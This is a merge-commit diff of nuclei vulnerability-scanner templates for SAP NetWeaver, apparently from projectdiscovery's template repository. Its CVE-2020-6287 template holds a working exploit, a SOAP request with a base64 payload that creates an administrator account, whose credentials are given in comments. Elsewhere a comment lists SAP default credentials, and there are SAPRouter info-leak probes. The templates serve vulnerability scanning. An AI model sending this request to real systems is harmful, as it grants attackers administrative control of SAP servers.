Merge pull request #1631 from projectdiscovery/sap_update

SAP NetWeaver update

cves/2020/CVE-2020-6287.yaml

@@ -1,7 +1,7 @@
 id: CVE-2020-6287
 
 info:
-  name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
+  name: SAP NetWeaver - Remote Admin addition
   author: dwisiswant0
   severity: critical
   tags: cve,cve2020,sap
@@ -11,24 +11,32 @@ info:
     - https://launchpad.support.sap.com/#/notes/2934135
     - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
     - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
+    - https://github.com/chipik/SAP_RECON
 
 requests:
-  - payloads:
-      data: helpers/payloads/CVE-2020-6287.xml
-    raw:
+  - raw:
       - |
         POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/xml; charset=UTF-8
         Connection: close
 
-        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
+          CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
+        </baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
+
+      # userName - sapRpoc6351
+      # password - Secure!PwD8890
+
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "urn:CTCWebServiceSi"
+          - "CTCWebServiceSi"
+          - "SOAP-ENV"
         part: body
+        condition: and
+
       - type: status
         status:
           - 200
@@ -36,4 +44,5 @@ requests:
       - type: word
         words:
           - "text/xml"
-        part: header
+          - "SAP NetWeaver Application Server"
+        part: header

exposed-panels/sap-netweaver-portal.yaml

@@ -1,10 +1,10 @@
-id: sap-netweaver-portal-detect
+id: sap-netweaver-portal
 
 info:
-  name: SAP NetWeaver Portal detect
+  name: SAP NetWeaver Portal
   author: organiccrap
   severity: info
-  tags: panel
+  tags: panel,sap
 
   # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
 

exposed-panels/sap-recon-detect.yaml

@@ -1,36 +0,0 @@
-id: sap-recon-detect
-
-info:
-  name: SAP RECON Finder
-  author: samueladi_ & organiccrap
-  severity: medium
-  tags: panel
-
-  # Source:- https://github.com/chipik/SAP_RECON
-  # This is detection template, please use above poc to exploit this further.
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
-      - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
-      - "{{BaseURL}}/CTCWebService/Config1?wsdl"
-
-    matchers-condition: and
-    matchers:
-
-      - type: word
-        words:
-          - Method Not Allowed
-          - Expected request method POST. Found GET.
-          - Generated by WSDLDefinitionsParser
-          - bns0:Config1Binding
-          - wsdl:definitions
-          - tns:CTCWebServiceSiBinding
-        condition: or
-
-      - type: status
-        status:
-          - 405
-          - 200
-        condition: or

helpers/payloads/CVE-2020-6287.xml

@@ -1 +0,0 @@
-<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>

misconfiguration/sap/sap-netweaver-info-leak.yaml

@@ -0,0 +1,25 @@
+id: sap-netweaver-info-leak
+
+info:
+  name: SAP NetWeaver ICM Info page leak
+  author: randomstr1ng
+  description: Detection of SAP NetWeaver ABAP Webserver /public/info page
+  severity: medium
+  tags: sap,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sap/public/info"
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "RFC_SYSTEM_INFO.Response"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "<RFCDEST>.*</RFCDEST>"

network/sap-router-info-leak.yaml

@@ -0,0 +1,24 @@
+id: sap-router-info-leak
+
+info:
+  name: SAPRouter - Routing information leak
+  author: randomstr1ng
+  severity: critical
+  tags: network,sap
+
+network:
+  - inputs:
+      - data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
+        type: hex
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:3299"
+    read-size: 2048
+
+    matchers:
+      - type: word
+        words:
+          - "Routtab"
+          - "Working directory"
+          - "SAProuter Connection Table"

network/sap-router.yaml

@@ -0,0 +1,22 @@
+id: sap-router
+
+info:
+  name: SAPRouter Detection
+  author: randomstr1ng
+  severity: info
+  tags: network,sap
+
+network:
+  - inputs:
+      - data: 57484f415245594f553f0a
+        type: hex
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:3299"
+    read-size: 1024
+
+    matchers:
+      - type: word
+        words:
+          - "SAProuter"

technologies/sap-netweaver-as-java-detect.yaml

@@ -1,20 +0,0 @@
-id: sap-netweaver-as-java-detect
-
-info:
-  name: SAP NetWeaver AS JAVA (LM Configuration Wizard) Detection
-  author: dwisiswant0
-  severity: info
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "urn:CTCWebServiceSi"
-        part: body
-      - type: status
-        status:
-          - 200

technologies/sap-netweaver-detect.yaml

@@ -1,13 +1,30 @@
 id: sap-netweaver-detect
+
 info:
-  name: SAP NetWeaver Detect
-  author: rakeshmane10
+  name: SAP NetWeaver ICM Detection
+  author: randomstr1ng
+  description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF)
   severity: info
+  tags: sap,webserver
+
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/irj/portal'
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
     matchers:
-      - type: word
-        words:
-          - NetWeaver
+      - type: regex
+        part: header
+        regex:
+          - "sap-server:"
+          - "Sap-Server:"
+          - "SAP NetWeaver Application Server"
+        condition: or
+
+    extractors:
+      - type: kval
+        part: header
+        kval:
+          - "server"

technologies/sap-netweaver-webgui.yaml

@@ -0,0 +1,23 @@
+id: sap-nw-webgui
+
+info:
+  name: SAP NetWeaver WebGUI Detection
+  author: randomstr1ng
+  description: Detection of SAP NetWeaver ABAP Webserver WebGUI
+  severity: info
+  tags: sap,webserver
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sap/bc/gui/sap/its/webgui"
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "sap-system-login"
+          - "<title>Logon</title>"
+        condition: or

workflows/sap-netweaver-workflow.yaml

@@ -6,10 +6,18 @@ info:
   description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target.
   tags: workflow
 
-  # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
-  # Old workflows still remains valid, and will be working with all nuclei versions.
-
 workflows:
-  - template: technologies/sap-netweaver-as-java-detect.yaml
+  - template: technologies/sap-netweaver-detect.yaml # HTTP Templates
     subtemplates:
       - template: cves/2020/CVE-2020-6287.yaml
+      - template: cves/2017/CVE-2017-12637.yaml
+      - template: cves/2020/CVE-2020-6308.yaml
+      - template: exposed-panels/fiorilaunchpad-logon.yaml
+      - template: exposed-panels/hmc-hybris-panel.yaml
+      - template: exposed-panels/sap-netweaver-portal.yaml
+      - template: exposed-panels/sap-hana-xsengine-panel.yaml
+      - template: misconfiguration/sap/
+
+  - template: network/sap-router.yaml # Network Templates
+    subtemplates:
+      - template: network/sap-router-info-leak.yaml